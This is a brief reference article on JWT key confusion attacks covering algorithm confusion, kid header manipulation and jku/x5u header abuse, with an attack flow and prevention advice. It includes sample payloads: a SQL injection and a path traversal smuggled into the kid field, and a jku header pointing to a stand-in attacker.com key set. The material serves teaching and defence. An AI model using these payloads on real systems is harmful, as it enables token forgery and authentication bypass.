JWT Key Confusion Attack

JWT Key Confusion attacks exploit vulnerabilities in how JWT libraries determine which key to use for verification. This includes algorithm confusion as well as attacks on key identification mechanisms like the "kid" (Key ID) header.

Types of Key Confusion

1. Algorithm-Based Confusion

Using asymmetric public key as symmetric secret (see Algorithm Confusion).

2. Key ID (kid) Manipulation

// Normal header with key ID
{"alg": "HS256", "typ": "JWT", "kid": "key-1"}

// Attack: SQL injection in kid
{"alg": "HS256", "typ": "JWT",
 "kid": "key-1' UNION SELECT 'secret' --"}

// Attack: Path traversal to use known file
{"alg": "HS256", "typ": "JWT",
 "kid": "../../public/known-file.txt"}

3. JKU/X5U Header Attacks

// jku: URL to fetch JWKS
{"alg": "RS256", "jku": "https://attacker.com/jwks.json"}

// Server fetches attacker's key set and uses their key!

Example Attack Flow

1. Identify JWT library and version
2. Check for algorithm confusion vulnerability
3. If kid header is used, test for injection
4. Check if jku/x5u headers are processed
5. Forge token with appropriate technique

Prevention

• Validate algorithm strictly against whitelist
• Never use user-controlled values directly in key lookup
• Sanitize kid parameter against path traversal/injection
• Whitelist allowed jku/x5u URLs or disable these features
• Use well-audited JWT libraries

See Also

• JWT Algorithm Confusion Attack
• JWT Kid Injection
• JSON Web Token (JWT)